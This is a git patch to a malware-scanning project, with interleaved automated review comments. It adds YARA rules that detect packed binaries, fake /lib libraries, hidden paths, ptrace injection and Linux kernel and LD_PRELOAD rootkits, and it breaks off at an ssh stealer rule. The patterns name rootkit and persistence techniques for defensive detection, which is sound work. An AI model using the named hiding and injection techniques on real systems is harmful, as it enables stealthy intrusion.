From b3c737930be836201d4779396de64b1c5c469dad Mon Sep 17 00:00:00 2001 
From: Thomas Stromberg Date: Sat, 9 Nov 2024 10:34:54 -0500 Subject: [PATCH 1/7] Improve coverage for timb-machine --- pkg/action/testdata/scan_archive | 3 +- rules/anti-static/elf/entropy.yara | 27 +++++ rules/anti-static/macho/entropy.yara | 26 +++++ .../location}/chdir-unusual.yara | 0 .../location}/dev-mqueue.yara | 0 .../location}/dev-shm.yara | 0 rules/evasion/file/location/lib.yara | 35 +++++++ .../location}/odd_pidfile.yara | 0 .../location}/system_directories.yara | 0 .../location}/system_directory.yara | 0 .../location/tmp_x11-unix.yara} | 0 .../location}/var-root.yara | 0 .../location}/var-run.yara | 0 .../location}/var-tmp.yara | 0 .../name}/rename_system_binary.yara | 0 .../dev_shm.yara => file/prefix/dev.yara} | 11 +++ rules/evasion/file/prefix/lib.yara | 26 +++++ .../hidden.yara => file/prefix/prefix.yara} | 16 --- .../{hidden_paths => file/prefix}/proc.yara | 0 rules/evasion/hidden_paths/dev_mqueue.yara | 10 -- rules/evasion/mimicry/fake-library.yara | 1 + .../process_injection/process-inject.yara | 17 ---- rules/evasion/process_injection/ptrace.yara | 17 ++++ rules/evasion/rootkit/linux_kernel.yara | 47 +++++++++ .../linux_userspace.yara} | 77 +++++++++++++++ rules/evasion/rootkit/posix_userspace.yara | 12 +++ rules/{impact => evasion}/rootkit/refs.yara | 0 .../program/hidden.yara} | 0 rules/exfil/stealer/ssh.yara | 22 +++++ rules/impact/degrade/firewall.yara | 92 ++++++++++++++++++ rules/impact/degrade/iptables.yara | 16 --- rules/impact/degrade/selinux_firewall.yara | 22 ----- rules/impact/degrade/ufw.yara | 24 ----- rules/impact/rootkit/readdir-interceptor.yara | 65 ------------- rules/lateral/scan/scan_tool.yara | 15 ++- rules/malware/family/medusa.yara | 3 +- rules/persist/service/install.yara | 27 +++++ rules/process/thread_local_storage.yara | 4 +- rules/sec-tool/pentest/smbexec.yara | 11 +++ tests/does-nothing/does-nothing.simple | 1 + .../lottie-player.min.js.mdiff | 3 +- .../clean/203.b7219352.chunk.js.simple | 1 + 
...4796BB27126E03A7E25DD5D589.cache.js.simple | 2 +- ...D016DDDA0665CB8CD8EEA6C537.cache.js.simple | 2 +- tests/javascript/clean/connection.js.simple | 1 + tests/javascript/clean/faker.js.simple | 3 +- tests/javascript/clean/faker.min.js.simple | 3 +- .../clean/frequency_lists.js.simple | 1 + .../javascript/clean/highlight.esm.js.simple | 2 +- tests/javascript/clean/highlight.js.simple | 2 +- tests/javascript/clean/mode-php.js.simple | 2 +- .../clean/mode-php_laravel_blade.js.simple | 2 +- tests/javascript/clean/php.js.simple | 2 +- .../clean/securityDashboards.plugin.js.simple | 1 + tests/javascript/clean/zxcvbn.js.simple | 1 + tests/linux/2021.FontOnLake/45E9.elf.simple | 9 +- tests/linux/2021.XMR-Stak/1b1a56.elf.simple | 4 +- .../2022.Symbiote/kerneldev.so.bkp.simple | 2 +- tests/linux/2022.bpfdoor/bpfdoor_2.simple | 2 +- tests/linux/2022.ez-pwnkit/payload.simple | 1 + .../freedownloadmanager.sdiff | 2 +- tests/linux/2023.Kinsing/install.sh.simple | 11 +-- tests/linux/2024.Darkcracks/darkcracks.sh.md | 2 +- .../eight-nebraska-autumn-illinois.simple | 3 +- tests/linux/2024.Mirai/ppc.simple | 1 + .../uranus-ack-mike-cat.simple | 3 +- tests/linux/2024.chisel/crondx.simple | 1 + ...4084b7471bc5aed1c81803054f017240a72.simple | 3 +- tests/linux/2024.gas/gas.simple | 1 + .../2024.hadooken/crondr_as_bash.sh.simple | 2 +- tests/linux/2024.hadooken/ssh_worm.sh.simple | 2 +- .../linux/2024.k4spreader/degrader.sh.simple | 3 +- tests/linux/2024.k4spreader/knlib.simple | 2 +- tests/linux/2024.kubo_injector/injector.json | 24 +++-- .../emp3r0r.agent.simple | 9 +- .../2024.kworker_pretenders/gafgyt.simple | 7 +- tests/linux/2024.medusa/rkload.simple | 14 ++- tests/linux/2024.miner_dropper/drop.sh.simple | 2 +- tests/linux/2024.sbcl.market/sbcl.sdiff | 5 +- ...5d0e2031551f9f1a70b6db475ba71b2.elf.simple | 1 + tests/linux/UPX/06ed158.md | 1 + tests/linux/clean/appsec-rules.json.simple | 3 +- tests/linux/clean/caddy.simple | 4 +- tests/linux/clean/chezmoi.simple | 2 +- 
tests/linux/clean/chrome.simple | 4 +- tests/linux/clean/clickhouse.simple | 8 +- tests/linux/clean/code-oss.md | 5 +- tests/linux/clean/containerd.simple | 7 +- tests/linux/clean/cpack.md | 3 +- tests/linux/clean/default_config.json.simple | 3 +- tests/linux/clean/emscripten.sh.simple | 2 +- ...-9b70-456b-b6b8-007c7d246128_5.json.simple | 6 +- .../kibana/securitySolution.chunk.9.js.simple | 5 +- tests/linux/clean/kuma-cp.simple | 5 +- tests/linux/clean/ld-2.27.so.simple | 2 +- tests/linux/clean/libsystemd.so.0.simple | 5 +- tests/linux/clean/ls.x86_64.md | 1 + tests/linux/clean/lslogins.md | 2 +- tests/linux/clean/melange.simple | 5 +- .../linux/clean/misp_sample.ndjson.log.simple | 2 +- tests/linux/clean/mongosh.simple | 2 +- tests/linux/clean/nvim.simple | 5 +- tests/linux/clean/opa.simple | 1 + tests/linux/clean/pandoc.md | 2 +- tests/linux/clean/ping.x86_64.md | 1 + tests/linux/clean/pulumi.simple | 2 +- .../clean/pypi_package_index.json.simple | 3 +- tests/linux/clean/qemu-system-xtensa.md | 4 +- tests/linux/clean/redis-server.aarch64.md | 1 + tests/linux/clean/rules.json.simple | 5 +- .../clean/runtime-security-fentry.o.simple | 1 + .../runtime-security-syscall-wrapper.o.simple | 1 + tests/linux/clean/runtime-security.o.simple | 1 + tests/linux/clean/searchindex.json.simple | 6 +- tests/linux/clean/slack.md | 6 +- tests/linux/clean/slirp4netns.simple | 4 +- .../clean/sonarlint-metadata.json.simple | 5 +- tests/linux/clean/sudo.simple | 5 +- tests/linux/clean/tracer.o.aarch64.simple | 1 + tests/linux/clean/tree-sitter.md | 87 +++++++++-------- tests/linux/clean/trivy.simple | 8 +- tests/linux/clean/trufflehog.md | 6 +- tests/linux/clean/viewgam.md | 1 + tests/linux/clean/wolfictl.simple | 6 +- tests/linux/clean/zipdetails.md | 2 +- .../2023.3CX/libffmpeg.change_decrease.mdiff | Bin 39788 -> 39788 bytes .../2023.3CX/libffmpeg.change_increase.mdiff | 2 +- tests/macOS/2023.3CX/libffmpeg.decrease.mdiff | Bin 39788 -> 39788 bytes 
tests/macOS/2023.3CX/libffmpeg.dirty.mdiff | 2 +- tests/macOS/2023.3CX/libffmpeg.increase.mdiff | 2 +- .../var_tmp_exe_starting2.simple | 2 +- tests/macOS/2024.BeaverTail/Jami.json | 8 ++ .../2024.BeaverTail/client_5346.py.simple | 2 +- tests/macOS/2024.Ezuri/libdpt1.so.simple | 1 + tests/macOS/2024.LightSpy/dropper.simple | 2 +- tests/macOS/2024.Rustdoor/localfile.simple | 3 +- tests/macOS/clean/ls.mdiff | 1 + tests/macOS/clean/ls.sdiff.level_2 | 1 + tests/macOS/clean/ls.sdiff.trigger_2 | 1 + tests/macOS/clean/ls.sdiff.trigger_3 | 1 + .../package.json.simple | 2 +- tests/php/clean/composer-2.7.7.simple | 2 +- tests/php/clean/run-tests.php.simple | 1 + .../valyrian_debug_setup.py.simple | 2 +- tests/python/2023.JokerSpy/shared.dat.simple | 2 +- tests/python/clean/numpy/misc_util.py.simple | 2 +- .../windows/2024.aspdasdksa2/creal.exe.simple | 1 + .../windows/2024.aspdasdksa2/creal.pyc.simple | 1 + 148 files changed, 699 insertions(+), 354 deletions(-) create mode 100644 rules/anti-static/elf/entropy.yara create mode 100644 rules/anti-static/macho/entropy.yara rename rules/evasion/{covert-location => file/location}/chdir-unusual.yara (100%) rename rules/evasion/{covert-location => file/location}/dev-mqueue.yara (100%) rename rules/evasion/{covert-location => file/location}/dev-shm.yara (100%) create mode 100644 rules/evasion/file/location/lib.yara rename rules/evasion/{hidden_paths => file/location}/odd_pidfile.yara (100%) rename rules/evasion/{hide_artifacts => file/location}/system_directories.yara (100%) rename rules/evasion/{hide_artifacts => file/location}/system_directory.yara (100%) rename rules/evasion/{hidden_paths/x11.yara => file/location/tmp_x11-unix.yara} (100%) rename rules/evasion/{covert-location => file/location}/var-root.yara (100%) rename rules/evasion/{hidden_paths => file/location}/var-run.yara (100%) rename rules/evasion/{hidden_paths => file/location}/var-tmp.yara (100%) rename rules/evasion/{alt_location => 
file/name}/rename_system_binary.yara (100%) rename rules/evasion/{hidden_paths/dev_shm.yara => file/prefix/dev.yara} (76%) create mode 100644 rules/evasion/file/prefix/lib.yara rename rules/evasion/{hidden_paths/hidden.yara => file/prefix/prefix.yara} (79%) rename rules/evasion/{hidden_paths => file/prefix}/proc.yara (100%) delete mode 100644 rules/evasion/hidden_paths/dev_mqueue.yara create mode 100644 rules/evasion/rootkit/linux_kernel.yara rename rules/evasion/{hijack_execution/process-hide.yara => rootkit/linux_userspace.yara} (51%) create mode 100644 rules/evasion/rootkit/posix_userspace.yara rename rules/{impact => evasion}/rootkit/refs.yara (100%) rename rules/{evasion/hidden_paths/relative-hidden.yara => exec/program/hidden.yara} (100%) create mode 100644 rules/impact/degrade/firewall.yara delete mode 100644 rules/impact/degrade/iptables.yara delete mode 100644 rules/impact/degrade/selinux_firewall.yara delete mode 100644 rules/impact/degrade/ufw.yara delete mode 100644 rules/impact/rootkit/readdir-interceptor.yara create mode 100644 rules/persist/service/install.yara create mode 100644 rules/sec-tool/pentest/smbexec.yara diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive index 3ca22cb57..bcb250b48 100644 --- a/pkg/action/testdata/scan_archive +++ b/pkg/action/testdata/scan_archive @@ -32,7 +32,7 @@ discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/hide_artifacts/pivot_root: medium exec/plugin: low exec/program: medium @@ -74,6 +74,7 @@ fs/symlink_resolve: low fs/tempdir/tempfile_create: low fs/unmount: low impact/remote_access/heartbeat: medium +lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/rules/anti-static/elf/entropy.yara b/rules/anti-static/elf/entropy.yara new file mode 100644 index 000000000..26bdc373a --- /dev/null 
+++ b/rules/anti-static/elf/entropy.yara @@ -0,0 +1,27 @@ +import "math" + +private rule normal_elf { + condition: + filesize < 64MB and uint32(0) == 1179403647 +} + +private rule small_elf { + condition: + filesize < 400KB and uint32(0) == 1179403647 +} + +rule normal_elf_high_entropy_7: medium { + meta: + description = "higher entropy ELF binary (>7)" + + condition: + normal_elf and math.entropy(1, filesize) >= 7 +} + +rule normal_elf_high_entropy_7_2: high { + meta: + description = "high entropy ELF binary (>7.2)" + + condition: + normal_elf and math.entropy(1, filesize) >= 7.2 +} diff --git a/rules/anti-static/macho/entropy.yara b/rules/anti-static/macho/entropy.yara new file mode 100644 index 000000000..6cd1ea679 --- /dev/null +++ b/rules/anti-static/macho/entropy.yara @@ -0,0 +1,26 @@ +import "math" + +private rule smaller_macho { + condition: + filesize < 64MB and (uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) +} + +rule high_entropy_7_2: medium { + meta: + description = "higher entropy binary (>7.2)" + + condition: + smaller_macho and math.entropy(1, filesize) >= 7.2 +} + +rule high_entropy_7_9: high { + meta: + description = "high entropy binary (>7.9)" + + strings: + // prevent bazel false positive + $bin_java = "bin/java" + + condition: + smaller_macho and math.entropy(1, filesize) >= 7.9 and not $bin_java +} diff --git a/rules/evasion/covert-location/chdir-unusual.yara b/rules/evasion/file/location/chdir-unusual.yara similarity index 100% rename from rules/evasion/covert-location/chdir-unusual.yara rename to rules/evasion/file/location/chdir-unusual.yara diff --git a/rules/evasion/covert-location/dev-mqueue.yara b/rules/evasion/file/location/dev-mqueue.yara similarity index 100% rename from rules/evasion/covert-location/dev-mqueue.yara rename to rules/evasion/file/location/dev-mqueue.yara 
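Review bot: `private rule small_elf` is declared but nothing in this file references it, and `math.entropy(1, filesize)` in both `normal_elf_high_entropy_*` rules passes a length rather than an end offset, so it asks for one byte past EOF; `math.entropy(0, filesize)` is the conventional whole-file call, and the dead private rule can go. Whole-file entropy on anything up to 64MB will presumably also flag legitimate ELF binaries that embed compressed payloads, so a `hash_*` meta naming the packed sample that motivated the 7.2 cut-off would make the threshold reviewable later. The rule names also follow a different convention from the Mach-O siblings (`normal_elf_high_entropy_7_2` vs `high_entropy_7_2`); one naming scheme across both files keeps the emitted finding keys predictable.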
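Review bot: `smaller_macho` accepts `uint32(0) == 3199925962`, i.e. the bytes `CA FE BA BE` at offset 0, which is the on-disk fat/universal magic but also the Java class-file magic, so every `.class` file in a scanned tree is treated as a Mach-O by these rules; the `$bin_java` exclusion in `high_entropy_7_9` looks like a symptom of exactly that collision rather than a fix. Bytes 4–7 disambiguate the two formats — a fat header stores a small `nfat_arch` there, a class file stores its minor/major version (45 and up) — so gate that one magic with `(uint32(0) == 3199925962 and uint32be(4) < 30)` and the `$bin_java` string becomes unnecessary. The remaining magics (`FEEDFACE`/`FEEDFACF` and their byte-swapped forms) are fine as written.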
diff --git a/rules/evasion/covert-location/dev-shm.yara b/rules/evasion/file/location/dev-shm.yara similarity index 100% rename from rules/evasion/covert-location/dev-shm.yara rename to rules/evasion/file/location/dev-shm.yara diff --git a/rules/evasion/file/location/lib.yara b/rules/evasion/file/location/lib.yara new file mode 100644 index 000000000..9882dba36 --- /dev/null +++ b/rules/evasion/file/location/lib.yara @@ -0,0 +1,35 @@ +rule libsec: medium linux { + meta: + description = "may pretend to be a fake library" + + strings: + $sec = /\/lib\/libsec[\w\.]{0,16}/ fullword + $dsx = /\/lib\/libdsx[\w\.]{0,16}/ fullword + + condition: + any of them +} + +rule libsec_subdir: high linux { + meta: + description = "fake security library directory" + + strings: + $ref = /\/lib\/libsec[\w\.]{0,16}\/[\.\w\-\%\@]{0,16}/ fullword + + condition: + any of them +} + +rule install_to_lib: high linux { + meta: + description = "may transfer fake libraries into /lib" + + strings: + $cp_p = /cp -p [\w\%\/\.]{0,16} \/lib\/\w{0,16}\.so[\.\s]{0,8}/ fullword + $cp = /cp [\w\%\/\.]{0,16} \/lib\/\w{0,16}\.so[\.\s]{0,8}/ fullword + $mv = /mv [\w\%\/\.]{0,16} \/lib\/\w{0,16}\.so[\.\s]{0,8}/ fullword + + condition: + any of them +} diff --git a/rules/evasion/hidden_paths/odd_pidfile.yara b/rules/evasion/file/location/odd_pidfile.yara similarity index 100% rename from rules/evasion/hidden_paths/odd_pidfile.yara rename to rules/evasion/file/location/odd_pidfile.yara diff --git a/rules/evasion/hide_artifacts/system_directories.yara b/rules/evasion/file/location/system_directories.yara similarity index 100% rename from rules/evasion/hide_artifacts/system_directories.yara rename to rules/evasion/file/location/system_directories.yara diff --git a/rules/evasion/hide_artifacts/system_directory.yara b/rules/evasion/file/location/system_directory.yara similarity index 100% rename from rules/evasion/hide_artifacts/system_directory.yara rename to rules/evasion/file/location/system_directory.yara 
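Review bot: `$sec` in `libsec` matches real system libraries whose names happen to start with `libsec`: `fullword` only rejects an alphanumeric immediately before the match, so `/usr/lib/libselinux.so.1` is excluded, but a bare `/lib/libselinux.so.1`, `/lib/libseccomp.so.2` or `/lib/libsecret-1.so.0` (`-` is not a word character, so the boundary check passes) satisfies it and yields a medium finding on anything that references those paths literally. Add explicit exclusions — `$not_selinux = "libselinux"`, `$not_seccomp = "libseccomp"`, `$not_secret = "libsecret"` — and change the condition to `any of ($sec, $dsx) and none of ($not*)`, or restrict the regex to the specific fake names observed in the sample that motivated the rule. `libsec_subdir` (a directory under that name) and `install_to_lib` are narrower and look fine.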
diff --git a/rules/evasion/hidden_paths/x11.yara b/rules/evasion/file/location/tmp_x11-unix.yara similarity index 100% rename from rules/evasion/hidden_paths/x11.yara rename to rules/evasion/file/location/tmp_x11-unix.yara diff --git a/rules/evasion/covert-location/var-root.yara b/rules/evasion/file/location/var-root.yara similarity index 100% rename from rules/evasion/covert-location/var-root.yara rename to rules/evasion/file/location/var-root.yara diff --git a/rules/evasion/hidden_paths/var-run.yara b/rules/evasion/file/location/var-run.yara similarity index 100% rename from rules/evasion/hidden_paths/var-run.yara rename to rules/evasion/file/location/var-run.yara diff --git a/rules/evasion/hidden_paths/var-tmp.yara b/rules/evasion/file/location/var-tmp.yara similarity index 100% rename from rules/evasion/hidden_paths/var-tmp.yara rename to rules/evasion/file/location/var-tmp.yara diff --git a/rules/evasion/alt_location/rename_system_binary.yara b/rules/evasion/file/name/rename_system_binary.yara similarity index 100% rename from rules/evasion/alt_location/rename_system_binary.yara rename to rules/evasion/file/name/rename_system_binary.yara diff --git a/rules/evasion/hidden_paths/dev_shm.yara b/rules/evasion/file/prefix/dev.yara similarity index 76% rename from rules/evasion/hidden_paths/dev_shm.yara rename to rules/evasion/file/prefix/dev.yara index 85ad99723..e34995047 100644 --- a/rules/evasion/hidden_paths/dev_shm.yara +++ b/rules/evasion/file/prefix/dev.yara @@ -12,3 +12,14 @@ rule dev_shm_hidden: critical linux { condition: $dev_shm and not $ignore_mkstemp } + +rule dev_mqueue_hidden: high { + meta: + description = "path reference within /dev/mqueue (world writeable)" + + strings: + $mqueue = /\/dev\/mqueue\/\.[%\w\.\-\/]{0,64}/ + + condition: + any of them +} diff --git a/rules/evasion/file/prefix/lib.yara b/rules/evasion/file/prefix/lib.yara new file mode 100644 index 000000000..39eb2a2dd --- /dev/null +++ b/rules/evasion/file/prefix/lib.yara 
@@ -0,0 +1,26 @@ +rule lib_subdir: high linux { + meta: + description = "hides paths within a /lib subdirectory" + + strings: + $ref = /\/lib\/[\w\.]{0,16}\/\.[\.\w\-\%\@]{0,16}/ fullword + + condition: + any of them +} + +rule hidden_library: high { + meta: + description = "hidden path in a Library directory" + hash_2018_Calisto = "81c127c3cceaf44df10bb3ceb20ce1774f6a9ead0db4bd991abf39db828661cc" + hash_2022_CloudMensis_WindowServer = "317ce26cae14dc9a5e4d4667f00fee771b4543e91c944580bbb136e7fe339427" + hash_2020_MacOS_TinkaOTP = "90fbc26c65e4aa285a3f7ee6ff8a3a4318a8961ebca71d47f51ef0b4b7829fd0" + + strings: + $hidden_library = /\/Library\/\.\w{1,128}/ + $not_dotdot = "/Library/../" + $not_private = "/System/Library/PrivateFrameworks/" + + condition: + $hidden_library and none of ($not*) +} diff --git a/rules/evasion/hidden_paths/hidden.yara b/rules/evasion/file/prefix/prefix.yara similarity index 79% rename from rules/evasion/hidden_paths/hidden.yara rename to rules/evasion/file/prefix/prefix.yara index 3601902d3..e5160b02a 100644 --- a/rules/evasion/hidden_paths/hidden.yara +++ b/rules/evasion/file/prefix/prefix.yara @@ -73,19 +73,3 @@ rule hidden_danger_path: critical { condition: $ref } - -rule hidden_library: high { - meta: - description = "hidden path in a Library directory" - hash_2018_Calisto = "81c127c3cceaf44df10bb3ceb20ce1774f6a9ead0db4bd991abf39db828661cc" - hash_2022_CloudMensis_WindowServer = "317ce26cae14dc9a5e4d4667f00fee771b4543e91c944580bbb136e7fe339427" - hash_2020_MacOS_TinkaOTP = "90fbc26c65e4aa285a3f7ee6ff8a3a4318a8961ebca71d47f51ef0b4b7829fd0" - - strings: - $hidden_library = /\/Library\/\.\w{1,128}/ - $not_dotdot = "/Library/../" - $not_private = "/System/Library/PrivateFrameworks/" - - condition: - $hidden_library and none of ($not*) -} diff --git a/rules/evasion/hidden_paths/proc.yara b/rules/evasion/file/prefix/proc.yara similarity index 100% rename from rules/evasion/hidden_paths/proc.yara rename to rules/evasion/file/prefix/proc.yara 
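Review bot: `$ref` in `lib_subdir` can match a bare `.` or `..` path component, because `\.[\.\w\-\%\@]{0,16}` is satisfied by a lone dot followed by nothing and `fullword` then only sees the surrounding `/` characters; a relative reference such as `/lib/systemd/../` at the start of a string therefore raises a high `hides paths within a /lib subdirectory` finding. Require the first character after the dot to be something other than a dot, `$ref = /\/lib\/[\w\.]{0,16}\/\.[\w\-\%\@][\.\w\-\%\@]{0,15}/ fullword`, which is the same `..` exclusion `hidden_library` in this file already carries via `$not_dotdot`. `hidden_library` itself is moved verbatim from `hidden_paths/hidden.yara`, so there is nothing new to review there.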
diff --git a/rules/evasion/hidden_paths/dev_mqueue.yara b/rules/evasion/hidden_paths/dev_mqueue.yara deleted file mode 100644 index 584e9587f..000000000 --- a/rules/evasion/hidden_paths/dev_mqueue.yara +++ /dev/null @@ -1,10 +0,0 @@ -rule dev_mqueue_hidden: high { - meta: - description = "path reference within /dev/mqueue (world writeable)" - - strings: - $mqueue = /\/dev\/mqueue\/\.[%\w\.\-\/]{0,64}/ - - condition: - any of them -} diff --git a/rules/evasion/mimicry/fake-library.yara b/rules/evasion/mimicry/fake-library.yara index 142516adc..ca943c51f 100644 --- a/rules/evasion/mimicry/fake-library.yara +++ b/rules/evasion/mimicry/fake-library.yara @@ -38,3 +38,4 @@ rule libc_fake_number_val: high { condition: any of them } + diff --git a/rules/evasion/process_injection/process-inject.yara b/rules/evasion/process_injection/process-inject.yara index b214d4f19..7221d4021 100644 --- a/rules/evasion/process_injection/process-inject.yara +++ b/rules/evasion/process_injection/process-inject.yara @@ -1,20 +1,3 @@ -rule ptrace_injector: high { - meta: - description = "may inject code into other processes" - hash_2024_procinject_infect = "cb7c09e58c5314e0429ace2f0e1f3ebd0b802489273e4b8e7531ea41fa107973" - - strings: - $maps = /\/{0,1}proc\/[%{][%}\w]{0,1}\/maps/ - $ptrace = "ptrace" fullword - $proc = "process" fullword - $not_qemu = "QEMU_IS_ALIGNED" - $not_chromium = "CHROMIUM_TIMESTAMP" - $not_crashpad = "CRASHPAD" fullword - - condition: - filesize < 67108864 and $maps and $ptrace and $proc and none of ($not*) -} - rule library_injector: high { meta: description = "may inject code into other processes" diff --git a/rules/evasion/process_injection/ptrace.yara b/rules/evasion/process_injection/ptrace.yara index 5ac24b40a..f9331847e 100644 --- a/rules/evasion/process_injection/ptrace.yara +++ b/rules/evasion/process_injection/ptrace.yara 
@@ -12,3 +12,20 @@ rule ptrace: medium { condition: any of them } + +rule ptrace_injector: high { + meta: + description = "may inject code into other processes" + hash_2024_procinject_infect = "cb7c09e58c5314e0429ace2f0e1f3ebd0b802489273e4b8e7531ea41fa107973" + + strings: + $maps = /\/{0,1}proc\/[%{][%}\w]{0,1}\/maps/ + $ptrace = "ptrace" fullword + $proc = "process" fullword + $not_qemu = "QEMU_IS_ALIGNED" + $not_chromium = "CHROMIUM_TIMESTAMP" + $not_crashpad = "CRASHPAD" fullword + + condition: + filesize < 67108864 and $maps and $ptrace and $proc and none of ($not*) +} diff --git a/rules/evasion/rootkit/linux_kernel.yara b/rules/evasion/rootkit/linux_kernel.yara new file mode 100644 index 000000000..5714bba81 --- /dev/null +++ b/rules/evasion/rootkit/linux_kernel.yara 
@@ -0,0 +1,47 @@ +rule linux_kernel_module_getdents64: critical linux { + meta: + description = "kernel module that intercepts directory listing" + ref = "https://github.com/m0nad/Diamorphine" + hash_2022_LQvKibDTq4_diamorphine = "aec68cfa75b582616c8fbce22eecf463ddb0c09b692a1b82a8de23fb0203fede" + hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" + hash_2023_LQvKibDTq4_diamorphine = "d83f43f47c1438d900143891e7a542d1d24f9adcbd649b7698d8ee7585068039" + filetypes = "elf,so" + + strings: + $getdents64 = "getdents64" + $register_kprobe = "register_kprobe" + + condition: + filesize < 1MB and all of them +} + +rule funky_high_signal_killer: high { + meta: + description = "Uses high signals to communicate to a rootkit" + hash_2023_Qubitstrike_branch_raw_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd" + hash_2023_Qubitstrike_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd" + hash_2024_locutus_borg_transwarp = "4573af129e3e1a197050e2fd066f846c92de64d8d14a81a13d975a2cbc6d391e" + + strings: + $odd_teen_sig = /kill -1[012346789]/ fullword + $high_sig = /kill -[23456]\d/ fullword + + condition: + filesize < 10MB and any of them +} + +rule lkm_dirent: high { + meta: + description = "kernel rootkit designed to hide files (linux_dirent)" + hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" + filetypes = "so" + + strings: + $l_dirent = "linux_dirent" + $linux = "Linux" + $not_syscalls = "#define _LINUX_SYSCALLS_H" + $not_itimer = "__kernel_old_itimerval" + + condition: + filesize < 2MB and all of ($l*) and none of ($not*) +} diff --git a/rules/evasion/hijack_execution/process-hide.yara b/rules/evasion/rootkit/linux_userspace.yara similarity index 51% rename from rules/evasion/hijack_execution/process-hide.yara rename to rules/evasion/rootkit/linux_userspace.yara index df35218e1..e7c42b737 100644 
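Review bot: `funky_high_signal_killer` fires at high on `kill -10`, `-12`, `-18`, `-19` and `-20` (SIGUSR1/SIGUSR2/SIGCONT/SIGSTOP/SIGTSTP), which are ordinary numeric signals in service and job-control scripts, while the description targets the private signal numbers a rootkit listens on (Diamorphine's defaults are, as I recall, in the 31–64 range). Narrowing to real-time signals and above, `$high_sig = /kill -(3[1-9]|[456]\d)/ fullword`, and dropping `$odd_teen_sig` removes the common benign forms; check the Qubitstrike and locutus samples in the meta still match before landing that, and if one of them relies on a teen signal, say so in the meta. Separately, `linux_kernel_module_getdents64` repeats the `hash_2023_LQvKibDTq4_diamorphine` meta key with two different values — it compiles, but any tool that reads meta as a map keeps only the last one, so give the second a distinct suffix.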
--- a/rules/evasion/hijack_execution/process-hide.yara
+++ b/rules/evasion/rootkit/linux_userspace.yara
@@ -1,3 +1,80 @@ +rule readdir_intercept: high { + meta: + description = "userland rootkit designed to hide files (readdir64)" + hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116" + hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71" + hash_2023_lib_skit = "427b1d16f16736cf8cee43a7c54cd448ca46ac9b573614def400d2d8d998e586" + filetypes = "so,c" + + strings: + $r_new65 = "readdir64" fullword + $r_old64 = "_readdir64" + $r_new32 = "readdir" fullword + $r_old32 = "_readdir" + $not_ld_debug = "LD_DEBUG" + $not_libc = "getusershell" + + condition: + filesize < 2MB and uint32(0) == 1179403647 and all of ($r*) and none of ($not*) +} + +rule readdir_tcp_wrapper_intercept: high { + meta: + description = "userland rootkit designed to hide files and bypass tcp-wrappers" + ref = "https://github.com/ldpreload/Medusa" + filetypes = "so,c" + + strings: + $r_new65 = "readdir64" fullword + $r_old64 = "_readdir64" + $r_new32 = "readdir" fullword + $r_old32 = "_readdir" + $r_hosts_access = "hosts_access" + + condition: + filesize < 2MB and uint32(0) == 1179403647 and all of ($r*) +} + +rule medusa_like_ld_preload: critical linux { + meta: + description = "LD_PRELOAD rootkit" + ref = "https://github.com/ldpreload/Medusa" + + strings: + $cloned_thread = "DYNAMIC LINKER BUG!" 
+ $__execve = "__execve" fullword + $lxstat64 = "__lxstat64" fullword + $syslog = "syslog" fullword + $LD_PRELOAD = "LD_PRELOAD" fullword + $LD_LIBRARY_PATH = "LD_LIBRARY_PATH" fullword + $archloaded = "archloaded" fullword + $rkload = "rkload" fullword + $wcs = "wcsmbsload" fullword + $readdir64 = "readdir64" fullword + + condition: + filesize < 2MB and 85 % of them +} + +rule linux_rootkit_terms: critical linux { + meta: + description = "appears to be a Linux rootkit" + filetypes = "elf,so" + + strings: + $s_Rootkit = "Rootkit" + $s_r00tkit = "r00tkit" + $s_r00tk1t = "r00tk1t" + $s_rootkit = "rootkit" fullword + + $o_systemctl = "systemctl" fullword + $o_sshd = "sshd" fullword + $o_miner = "miner" fullword + + condition: + filesize < 10MB and any of ($s*) and any of ($o*) +} + rule elf_processhide: high { meta: description = "userland rootkit designed to hide processes" diff --git a/rules/evasion/rootkit/posix_userspace.yara b/rules/evasion/rootkit/posix_userspace.yara new file mode 100644 index 000000000..8ae649c5c --- /dev/null +++ b/rules/evasion/rootkit/posix_userspace.yara @@ -0,0 +1,12 @@ +rule readdir_intercept_source: high { + meta: + description = "userland rootkit source designed to hide files (DECLARE_READDIR)" + filetypes = "so,c" + + strings: + $declare = "DECLARE_READDIR" + $hide = "hide" + + condition: + filesize < 200KB and all of them +} diff --git a/rules/impact/rootkit/refs.yara b/rules/evasion/rootkit/refs.yara similarity index 100% rename from rules/impact/rootkit/refs.yara rename to rules/evasion/rootkit/refs.yara diff --git a/rules/evasion/hidden_paths/relative-hidden.yara b/rules/exec/program/hidden.yara similarity index 100% rename from rules/evasion/hidden_paths/relative-hidden.yara rename to rules/exec/program/hidden.yara diff --git a/rules/exfil/stealer/ssh.yara b/rules/exfil/stealer/ssh.yara index 008799cce..6fb58f29d 100644 --- a/rules/exfil/stealer/ssh.yara +++ b/rules/exfil/stealer/ssh.yara 
